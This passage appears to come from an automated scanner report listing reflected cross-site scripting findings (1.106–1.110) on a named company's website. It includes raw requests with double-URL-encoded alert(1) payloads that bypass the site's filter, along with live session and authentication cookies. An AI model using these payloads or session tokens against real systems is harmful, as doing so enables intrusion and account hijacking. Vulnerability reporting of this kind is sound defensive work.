Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich49565";alert(1)//76b01f700a7/areas-of-interest/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.106. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcb63%2522%253balert%25281%2529%252f%252f821f33370a5 was submitted in the REST URL parameter 3. This input was echoed as fcb63";alert(1)//821f33370a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interestfcb63%2522%253balert%25281%2529%252f%252f821f33370a5/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestfcb63";alert(1)//821f33370a5/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.107. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8080f%2522%253balert%25281%2529%252f%252f2611162ee43 was submitted in the REST URL parameter 4. This input was echoed as 8080f";alert(1)//2611162ee43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science8080f%2522%253balert%25281%2529%252f%252f2611162ee43/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:06 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science8080f";alert(1)//2611162ee43/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.108. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a731c%2522%253balert%25281%2529%252f%252fe03672b8d7c was submitted in the REST URL parameter 5. This input was echoed as a731c";alert(1)//e03672b8d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/custom-oligosa731c%2522%253balert%25281%2529%252f%252fe03672b8d7c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:08 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/custom-oligosa731c";alert(1)//e03672b8d7c","E404") ;
   </script>
...[SNIP]...

1.109. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bce0%2522%253balert%25281%2529%252f%252f5946943de71 was submitted in the REST URL parameter 1. This input was echoed as 9bce0";alert(1)//5946943de71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content9bce0%2522%253balert%25281%2529%252f%252f5946943de71/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content9bce0";alert(1)//5946943de71/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.110. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63598%2522%253balert%25281%2529%252f%252f06fd2fe8eb1 was submitted in the REST URL parameter 2. This input was echoed as 63598";alert(1)//06fd2fe8eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich63598%2522%253balert%25281%2529%252f%252f06fd2fe8eb1/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
